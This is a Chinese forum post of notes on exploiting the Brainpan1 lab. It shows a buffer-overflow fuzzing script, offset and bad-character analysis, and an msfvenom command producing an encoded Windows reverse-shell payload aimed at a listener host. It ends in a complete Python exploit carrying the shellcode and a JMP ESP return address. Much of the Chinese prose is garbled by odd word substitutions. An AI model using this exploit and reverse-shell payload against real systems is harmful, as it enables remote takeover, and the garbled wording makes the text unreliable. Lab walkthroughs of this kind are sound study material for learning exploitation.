第十一篇红队笔记-百靶精讲之Brainpan1-缓存区溢出

打印 上一主题 下一主题

主题 806|帖子 806|积分 2418

nmap扫描



web渗透测试



缓冲区溢出漏洞辨认



  • 查看文件

  • 通过Immunity Debugger查看exe内存动态变化

    • 必要点击开始,右下角runing状态,此时相当于运行该exe


  • 编写py脚本判断是否存在缓冲溢出
  1. #! /usr/bin/python
  2. import socket
  3. import time
  4. import sys
  5. size = 100
  6. server = str(sys.argv[1])
  7. port = int(sys.argv[2])
  8. while True:
  9.     try:
  10.         print("\n[+] buffer is %s byets" % size);
  11.         buffer = "A" * size
  12.         s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  13.         s.connect((server,port))
  14.         print(buffer+"1")
  15.         s.send(buffer.encode())
  16.         s.close()
  17.         size += 100
  18.         time.sleep(3)
  19.     except:
  20.         print ("\n[+] Cloud not connect.")
  21.         sys.exit()
复制代码



  • 可以判定存在溢出且大小不会超过1k

定位eip寄存器



  • 确定漏洞溢出点的长度。一样寻常将工具 msf-pattern_create和 msf-pattern_offset共同使用。
  • msf-pattern_create天生上述溢出大小不会超过1k的长度字符串

  • 得到此时EIP内存地址为35724134

  • 根据EIP地址得出偏移量

  • 再次确认偏移量524是否精确的溢出点

esp扩容



  • 一样寻常一个payload字节是300-500字节


坏字节辨认



  • 判断esp中间有哪些坏字符不能被我们所用
  • 下载坏字符

    -判断坏字符是否都正常表现(\x00默认终止符号)


jmp esp定位



  • esp它的确是eip竣事之后去执行的,但是它具体在哪个位置上不清楚.
  • 使用eip地址去重定向到esp。所以我们要通过在eip这四个字节内里写上esp的地址。一样寻常使用jmp esp
  • 先用msf-nasm_shell工具明白想写的指令

    • 可看到jmp esp地址:\xff\xe4


  • !mona modules 查看可用的dll模块

  • 根据可用dll,搜刮jmp esp 地址

  • 得到JMP ESP地址:311712F3

payload编写

  1. # x86/shikata_ga_nai 防免杀
  2. msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.0.2.132 -e x86/shikata_ga_nai -b "\x00" -f python
复制代码

  1. #coding:utf-8
  2. import socket
  3. import time
  4. import sys
  5. size = 100
  6. server = str(sys.argv[1])
  7. port = int(sys.argv[2])
  8. while True:
  9.     try:
  10.         print("\n[+] buffer is %s byets" % size);
  11.         buf =  b""
  12.         buf += b"\xbb\x37\x60\x4f\x5f\xda\xc6\xd9\x74\x24\xf4\x5d"
  13.         buf += b"\x33\xc9\xb1\x52\x83\xed\xfc\x31\x5d\x0e\x03\x6a"
  14.         buf += b"\x6e\xad\xaa\x68\x86\xb3\x55\x90\x57\xd4\xdc\x75"
  15.         buf += b"\x66\xd4\xbb\xfe\xd9\xe4\xc8\x52\xd6\x8f\x9d\x46"
  16.         buf += b"\x6d\xfd\x09\x69\xc6\x48\x6c\x44\xd7\xe1\x4c\xc7"
  17.         buf += b"\x5b\xf8\x80\x27\x65\x33\xd5\x26\xa2\x2e\x14\x7a"
  18.         buf += b"\x7b\x24\x8b\x6a\x08\x70\x10\x01\x42\x94\x10\xf6"
  19.         buf += b"\x13\x97\x31\xa9\x28\xce\x91\x48\xfc\x7a\x98\x52"
  20.         buf += b"\xe1\x47\x52\xe9\xd1\x3c\x65\x3b\x28\xbc\xca\x02"
  21.         buf += b"\x84\x4f\x12\x43\x23\xb0\x61\xbd\x57\x4d\x72\x7a"
  22.         buf += b"\x25\x89\xf7\x98\x8d\x5a\xaf\x44\x2f\x8e\x36\x0f"
  23.         buf += b"\x23\x7b\x3c\x57\x20\x7a\x91\xec\x5c\xf7\x14\x22"
  24.         buf += b"\xd5\x43\x33\xe6\xbd\x10\x5a\xbf\x1b\xf6\x63\xdf"
  25.         buf += b"\xc3\xa7\xc1\x94\xee\xbc\x7b\xf7\x66\x70\xb6\x07"
  26.         buf += b"\x77\x1e\xc1\x74\x45\x81\x79\x12\xe5\x4a\xa4\xe5"
  27.         buf += b"\x0a\x61\x10\x79\xf5\x8a\x61\x50\x32\xde\x31\xca"
  28.         buf += b"\x93\x5f\xda\x0a\x1b\x8a\x4d\x5a\xb3\x65\x2e\x0a"
  29.         buf += b"\x73\xd6\xc6\x40\x7c\x09\xf6\x6b\x56\x22\x9d\x96"
  30.         buf += b"\x31\x47\x62\x9a\x45\x3f\x60\x9a\x44\x7b\xed\x7c"
  31.         buf += b"\x2c\x6b\xb8\xd7\xd9\x12\xe1\xa3\x78\xda\x3f\xce"
  32.         buf += b"\xbb\x50\xcc\x2f\x75\x91\xb9\x23\xe2\x51\xf4\x19"
  33.         buf += b"\xa5\x6e\x22\x35\x29\xfc\xa9\xc5\x24\x1d\x66\x92"
  34.         buf += b"\x61\xd3\x7f\x76\x9c\x4a\xd6\x64\x5d\x0a\x11\x2c"
  35.         buf += b"\xba\xef\x9c\xad\x4f\x4b\xbb\xbd\x89\x54\x87\xe9"
  36.         buf += b"\x45\x03\x51\x47\x20\xfd\x13\x31\xfa\x52\xfa\xd5"
  37.         buf += b"\x7b\x99\x3d\xa3\x83\xf4\xcb\x4b\x35\xa1\x8d\x74"
  38.         buf += b"\xfa\x25\x1a\x0d\xe6\xd5\xe5\xc4\xa2\xe6\xaf\x44"
  39.         buf += b"\x82\x6e\x76\x1d\x96\xf2\x89\xc8\xd5\x0a\x0a\xf8"
  40.         buf += b"\xa5\xe8\x12\x89\xa0\xb5\x94\x62\xd9\xa6\x70\x84"
  41.         buf += b"\x4e\xc6\x50"
  42.         buffer = "\x41" * 524 + "\xf3\x12\x17\x31" + "\x90" * 16 + buf
  43.         s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  44.         s.connect((server,port))
  45.         s.recv(1024)
  46.         s.send(buffer)
  47.         print "done"
  48.         size += 100
  49.         time.sleep(3)
  50.     except Exception as errorMsg:
  51.             print "产生错误了:%s'%errorMsg"
  52.             print "\n[+] Cloud not connect."
  53.             sys.exit()
复制代码


  • 监听shell反弹端口

乐成使用缓冲区漏洞



  • 同上(针对靶机linux)

巧用anansi_util提权


其他

缓冲区溢出漏洞流程



  • 解缓冲区溢出漏洞的辨认、大小,定位eip寄存器、esp寄存器扩容、坏字节辨认、jmp esp定位,payload天生
EIP、EBP、ESP的解读



  • EIP存储着下一条指令的地址,每执行一条指令,该寄存器变化一次。
  • EBP存储着当前函数栈底的地址,栈低通常作为基址,我们可以通过栈底地址和偏移相加减来获取变量地址(很紧张)。
  • ESP就是前面说的,始终指向栈顶,只要ESP指向变了,那么当前栈顶就变了。
为什么EIP是41414141可以判断缓冲区存在溢出



  • 这不是什么根本性的。这只是一个汗青惯例。更具体地说:测试缓冲区溢出的最简朴方法是在文本字段中键入一长串 A (AAAAAAAA…),然后看看会发生什么。如果程序崩溃,则可能轻易受到攻击。如果程序崩溃并且调试器在程序计数器中表现0x41414141,该程序险些肯定是脆弱的。(请记住,“A”的 ASCII 代码是十六进制0x41的,所以如果你在十六进制编辑器中查看 A 字符串的字节级表示形式,你会看到0x41414141。
  • 为什么是A?完全没有来由;它们只是字母表中的第一个字母。因此,这是渗透测试职员有时会使用的快速而肮脏的测试。但是,当然,0x41414141并没有什么特别之处。道格拉斯·亚当斯的粉丝可以输入一长串B,然后寻找0x42424242。那同样有效,甚至更有趣。
确认偏移量524是否精确的溢出点



  • 精确表现AABBCC=524是溢出点

怎么通过35724134地址得到524就是偏移量




  • 首先要知道内存地址和寻常书写地址是相反的,内存会把内存低地址放在高位,内存高地址放在低位,所以排列序次是:
    1. 35724134
    2. 34 41 72 35
    3. 4  A  r  5
    4. 4Ar5
    复制代码
  • 对照的就是pattern_create.rb天生的1000字符中524位的地方存在溢出,pattern_offset.rb会主动盘算在1000个字符中4Ar5位置
为什么要测试坏字符



  • 坏字符本意是 A 的机器码发送到服务端,服务端存入内存时却酿成了 B。比方说我想执行的shellcode 为 0a,但存入内存中后啪的一下酿成了 00,这就很欠好了,shellcode就不是我们原来正常的逻辑了。
发生pycommands:error importing module.



  • 下载python2.7
  • 查看Immunity Debugger\PyCommands该文件夹是否有mona.py,无则另外下载
怎么判定可用dll模块



  • SafeSEH、ASLR、NXCompat都是内存掩护机制所掩护的模块!
  • 要选择JMP ESP一定要选择这三项都未False的模块
为什么跑的是window-exe确实linux



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

何小豆儿在此

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表